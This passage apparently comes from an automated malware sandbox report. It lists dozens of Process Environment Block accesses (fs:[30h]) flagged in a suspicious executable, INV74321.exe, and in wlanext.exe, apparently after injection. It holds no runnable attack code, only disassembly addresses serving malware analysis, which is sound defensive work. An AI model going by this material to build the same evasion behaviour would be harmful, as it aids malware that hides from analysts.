          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B64257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B8D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B88DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B5A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B13D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B53540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B18EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B8FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B8FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B08E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03773B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03773B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03815BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03818B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03751B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03751B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037D4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03784A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03784A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03763A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03758A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03818A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov ecx, dword ptr fs:[00000030h]
